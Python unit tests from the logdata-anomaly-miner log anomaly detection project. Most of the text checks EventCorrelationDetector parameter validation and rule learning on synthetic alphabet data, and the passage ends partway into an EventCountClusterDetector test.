self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=100) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], hypothesis_max_delta_time=100.22) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=1.1) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_probability=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_probability=0) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_probability=0.5) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_probability=1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=1.1) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], generation_factor=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_factor=0) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_factor=0.5) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], generation_factor=1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=100.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], max_observations=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], max_observations=100) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=1.1) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], p0=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], p0=0) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], p0=0.5) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], p0=1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=1.1) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], alpha=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], alpha=0) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], alpha=0.5) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], alpha=1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=100.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], candidates_size=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], candidates_size=100) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=100) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], hypotheses_eval_delta_time=100.22) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=100) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], delta_time_to_discard_hypothesis=100.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=b"True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag="True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=123.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) @classmethod def setUpClass(cls): """Set up the data for the all tests.""" cls.alphabet = b"abcdefghijklmnopqrstuvwxyz" cls.analysis = "Analysis.%s" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(DummyFixedDataModelElement(char.decode(), char)) cls.alphabet_model = DummyFirstMatchModelElement("first", children) error_rate = 0.000085 cls.perfect_data_diff5 = cls.generate_perfect_data(cls, 30000, 5) cls.perfect_data_diff1 = cls.generate_perfect_data(cls, 30000, 1) cls.errored_data_diff5 = cls.generate_errored_data(cls, 100000, 5, error_rate) cls.errored_data_diff1 = cls.generate_errored_data(cls, 100000, 1, error_rate) cls.errored_data_diff5_low_error_rate = cls.generate_errored_data(cls, 100000, 5, error_rate / 2.5) cls.errored_data_diff1_low_error_rate = cls.generate_errored_data(cls, 100000, 1, error_rate / 2.5) set_random_seed(42) def check_rules(self, sorted_back_rules, sorted_forward_rules, diff): """Check if the rules are as expected.""" for path in sorted_forward_rules: self.assertEqual(len(sorted_forward_rules[path]), 5 / diff) implications = [] trigger = b"" for rule in sorted_forward_rules[path]: trigger = rule.trigger_event[0].split("/")[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split("/")[-1].encode())) for i in range(1, len(sorted_forward_rules[path]), 1): self.assertIn((self.alphabet.index(trigger) + i) % len(self.alphabet), implications) for path in sorted_back_rules: self.assertEqual(len(sorted_back_rules[path]), 5 / diff) trigger = b"" implications = [] for rule in sorted_back_rules[path]: trigger = rule.trigger_event[0].split("/")[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split("/")[-1].encode())) for i in range(1, len(sorted_back_rules[path]), 1): self.assertIn((self.alphabet.index(trigger) - i) % len(self.alphabet), implications) def check_anomaly_detection(self, ecd, t, diff): """Check if anomalies were detected as expected.""" for char in self.alphabet: self.reset_output_stream() char = bytes([char]) parser_match = ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char))) t += 5 * 3 ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)) # another LogAtom must be received to check the follow anomalies. t += 5 * 3 ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)) # precede anomaly for i in range(1, int(5 / diff) + 1, 1): self.assertIn("Event %s is missing, but should precede event %s" % ( repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) for i in range(int(5 / diff) + 1, len(self.alphabet), 1): self.assertNotIn("Event %s is missing, but should precede event %s" % ( repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) # follow anomaly for i in range(1, int(5 / diff) + 1, 1): self.assertIn("Event %s is missing, but should follow event %s" % ( repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) for i in range(int(5 / diff) + 1, len(self.alphabet), 1): self.assertNotIn("Event %s is missing, but should follow event %s" % ( repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) def run_ecd_test(self, ecd, log_atoms): """Run the ECD test.""" diff = log_atoms[1].atom_time - log_atoms[0].atom_time log_atom = None for log_atom in log_atoms: ecd.receive_atom(log_atom) sorted_forward_rules = dict(sorted(ecd.forward_rules.items())) sorted_back_rules = dict(sorted(ecd.back_rules.items())) self.assertEqual(len(sorted_forward_rules), len(self.alphabet_model.children)) self.assertEqual(len(sorted_back_rules), len(self.alphabet_model.children)) self.check_rules(sorted_back_rules, sorted_forward_rules, diff) ecd.learn_mode = False self.check_anomaly_detection(ecd, log_atom.atom_time, diff) def generate_perfect_data(self, iterations, diff): """Generate data without any error.""" log_atoms = [] t = time.time() for i in range(1, iterations+1): char = bytes([self.alphabet[i % len(self.alphabet)]]) parser_match = ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms def generate_errored_data(self, iterations, diff, error_rate): """Generate data with errors according to the error_rate.""" log_atoms = [] t = time.time() divisor = 1 while error_rate * divisor < 1: divisor = divisor * 10 err = divisor * error_rate divisor //= err for i in range(1, iterations+1): if i % divisor == 0 and i != 0: char = bytes([self.alphabet[int(i + random.uniform(diff+1, len(self.alphabet))) % len(self.alphabet)]]) else: char = bytes([self.alphabet[i % len(self.alphabet)]]) parser_match = ParserMatch(self.alphabet_model.get_match_element("parser", DummyMatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventCountClusterDetectorTest.py000066400000000000000000001254551500476301700321570ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventCountClusterDetector import EventCountClusterDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventCountClusterDetectorTest(TestBase): """Unittests for the EventFrequencyDetector.""" def test1receive_atom(self): """ This test checks the normal operation of EventCountClusterDetector. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ t = time.time() expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # The following log atoms are created: # window 1: # value a: 1 time by x, 1 time by y # value b: 1 time by x # window 2: # value a: 2 times by x, 1 time by y # value b: 1 time by x # window 3: # value b: 1 time by x # value c: 1 time by x # window 4: # value a: 1 time by x # Start of window 1: m1 = MatchElement("/p/value", b"a", b"a", None) m2 = MatchElement("/p/id", b"x", b"x", None) log_atom1 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m1, m2])), t+1, None) m3 = MatchElement("/p/value", b"a", b"a", None) m4 = MatchElement("/p/id", b"y", b"y", None) log_atom2 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m3, m4])), t+2, None) m5 = MatchElement("/p/value", b"b", b"b", None) m6 = MatchElement("/p/id", b"x", b"x", None) log_atom3 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m5, m6])), t+3, None) # Start of window 2: m7 = MatchElement("/p/value", b"a", b"a", None) m8 = MatchElement("/p/id", b"x", b"x", None) log_atom4 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m7, m8])), t+13, None) m9 = MatchElement("/p/value", b"a", b"a", None) m10 = MatchElement("/p/id", b"y", b"y", None) log_atom5 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m9, m10])), t+14, None) m11 = MatchElement("/p/value", b"b", b"b", None) m12 = MatchElement("/p/id", b"x", b"x", None) log_atom6 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m11, m12])), t+15, None) m13 = MatchElement("/p/value", b"a", b"a", None) m14 = MatchElement("/p/id", b"x", b"x", None) log_atom7 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m13, m14])), t+16, None) # Start of window 3: m15 = MatchElement("/p/value", b"c", b"c", None) m16 = MatchElement("/p/id", b"x", b"x", None) log_atom8 = LogAtom(b"cx", ParserMatch(MatchElement("/p", b"cx", b"cx", [m15, m16])), t+23, None) m17 = MatchElement("/p/value", b"b", b"b", None) m18 = MatchElement("/p/id", b"x", b"x", None) log_atom9 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m17, m18])), t+24, None) # Start of window 4: m19 = MatchElement("/p/value", b"a", b"a", None) m20 = MatchElement("/p/id", b"x", b"x", None) log_atom10 = 